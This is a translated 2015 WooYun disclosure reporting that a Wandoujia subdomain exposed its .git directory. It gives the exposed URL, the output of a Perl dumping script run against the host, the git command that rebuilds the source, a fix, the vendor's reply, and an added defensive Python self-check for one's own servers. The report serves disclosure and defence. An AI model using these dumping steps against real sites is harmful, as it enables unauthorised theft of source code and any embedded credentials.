
Vulnerability Summary

Defect ID: wooyun-2015-096049

Title: Improper use of the git service at Wandoujia (豌豆荚) leads to a full-site source code leak

Vendor: Wandoujia (豌豆荚)

Author: 我是小号

Submitted: 2015-02-07 12:51

Fixed: 2015-02-07 13:58

Published: 2015-02-07 13:58

Vulnerability type: disclosure of important sensitive information

Severity: medium

Self-assessed rank: 10

Status: fixed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-02-07: details sent to the vendor, awaiting vendor handling
2015-02-07: vendor confirmed; details disclosed to the vendor only
2015-02-07: vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public

Brief description:

Improper use of the git service at Wandoujia leads to a leak of the site's source code.

Detailed description:

Affected site: uowechat.wandoujia.com
#1.
Probing showed that the git configuration directory of one Wandoujia sub-site is accessible without authorization:
http://uowechat.wandoujia.com/.git/config

00.png


This means the entire source tree served by git can be pulled down without authorization.
#2. Use a Perl script to enumerate the directory automatically:

D:\>perl 1.pl -v -u http://uowechat.wandoujia.com/.git
[i] Downloading git files from http://uowechat.wandoujia.com/.git
[!] Not found for COMMIT_EDITMSG: 401 Unauthorized
[d] found config
[d] found description
[d] found HEAD
[d] found index
[d] found packed-refs
[!] Not found for objects/info/alternates: 401 Unauthorized
[!] Not found for info/grafts: 401 Unauthorized
[d] found logs/HEAD
[d] found refs/heads/master
[i] Running git fsck to check for missing items


At this point the whole directory has been pulled down; to make use of it:

git reset --hard


restores the entire site.

Proof of vulnerability:

Enter the directory and take a screenshot as proof:
~!: logs/HEAD

02.png


Suggested fix:

The git service should be configured correctly, so that the .git directory is not served to unauthenticated clients.
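A defender's self-audit for this class of misconfiguration, added here as an example and not part of the original report: it classifies one GET of /.git/HEAD on a host you administer (a real HEAD is told apart from an HTML soft-404 served with status 200, and the 401 responses in the log above count as blocked) and reads the served .git/config for remote URLs, which name the internal git host and may embed a login. SAMPLE_CONFIG, its hostname and check_own_host are constructed assumptions, not values from the report.

```python
import re
import urllib.request
from urllib.error import HTTPError, URLError

SAMPLE_CONFIG = """[core]
[remote "origin"]
    url = https://deploy:s3cret@git.internal.example/app.git
"""  # constructed sample, not taken from the report

HEAD_RE = re.compile(r"^(ref: refs/heads/\S+|[0-9a-f]{40})$")  # shape of a real .git/HEAD
CRED_RE = re.compile(r"://[^/@\s]+:[^/@\s]+@")                 # user:pass@ inside a URL

def looks_like_git_head(body):
    # One line, symbolic ref or bare commit id; an HTML "soft 404" served
    # with status 200 fails this test, so it is not counted as exposure.
    return HEAD_RE.match(body.strip()) is not None

def parse_git_config(body):
    # Minimal reader for git's INI-like config -> {section: {key: value}}.
    sections, current = {}, None
    for raw in body.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections

def remote_urls(config_body):
    # Remote URLs name the internal git host the deployment was pulled from.
    cfg = parse_git_config(config_body)
    return [v["url"] for s, v in cfg.items() if s.startswith("remote ") and "url" in v]

def leaked_credentials(config_body):
    # Remotes with an embedded user:password pair: rotate these first.
    return [u for u in remote_urls(config_body) if CRED_RE.search(u)]

def classify(status, body):
    # Verdict for one GET of /.git/HEAD; the 401s seen in the report count as blocked.
    if status in (401, 403, 404):
        return "blocked"
    return "exposed" if status == 200 and looks_like_git_head(body) else "not-git"

def check_own_host(base_url):
    # Fetch /.git/HEAD from a host you administer and classify the answer.
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/.git/HEAD", timeout=10) as r:
            return classify(r.status, r.read(4096).decode("utf-8", "replace"))
    except HTTPError as e:
        return classify(e.code, "")
```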

Copyright notice: please credit the source when reposting: 我是小号@乌云


Vulnerability Response

Vendor response:

Severity: medium

Vulnerability rank: 5

Confirmed: 2015-02-07 13:57

Vendor reply:

Thanks for helping with Wandoujia's security. The vulnerability has been handled. This code was open-source code pulled in by a junior colleague, which makes it slightly less serious, but we still need to improve.

Latest status:

2015-02-07: Fixed.

2015-02-07: The title seems a bit off: "whole site" gives the impression of Wandoujia's entire site, whereas this is actually two peripheral applications. Of course, a code leak from peripheral applications already deserves serious attention.

